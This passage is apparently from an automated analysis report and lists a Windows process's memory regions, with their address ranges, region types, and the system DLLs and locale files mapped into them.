"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1556 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1557 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1558 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1559 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1560 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1561 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1562 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1563 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1564 start_va = 0x6f0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1565 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1566 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1567 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1568 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1569 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1570 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1571 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1572 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1573 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1574 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1576 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1577 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1578 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1579 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1580 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1581 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1621 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1622 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1623 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1624 start_va = 0x7f0000 end_va = 0x13effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1625 start_va = 0x13f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 1626 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1627 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1628 start_va = 0x320000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1629 start_va = 0x1530000 end_va = 0x17fefff entry_point = 0x1530000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1631 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1632 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1714 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1715 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1716 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1717 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1718 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1719 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1720 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1721 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1722 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1723 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1724 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1725 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1726 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1727 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1728 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1729 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1730 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1731 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1732 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1733 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1734 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1735 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1736 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1737 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1738 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1739 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1740 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1741 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1742 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1743 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1744 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1745 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1746 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1747 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1748 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1765 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1766 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1767 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1768 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1769 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1770 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1771 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1772 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1773 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1774 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1775 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1776 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1777 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1778 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1779 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1780 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1781 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1782 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1783 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1784 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1785 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1786 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1787 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1788 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1789 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1790 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1791 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1792 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1793 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1794 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1795 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1806 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1807 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1808 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1809 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1810 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1811 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1812 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1813 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1814 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1815 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1816 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1817 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1818 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1819 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1820 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1821 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1822 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1823 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1824 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1825 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1826 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1827 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1828 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1829 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1830 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1831 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1832 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1833 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1834 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1835 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1836 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1837 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1838 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1839 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1840 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1866 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1867 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1868 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1869 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1870 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1871 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1872 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1873 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1874 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1875 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1876 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1877 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1878 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1879 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1880 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1881 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1937 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 1938 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 1939 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1940 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1941 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1942 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1943 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1944 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1945 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1946 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1947 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1948 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1958 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1959 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1960 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1961 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1962 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1963 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1967 start_va = 0x2a0000 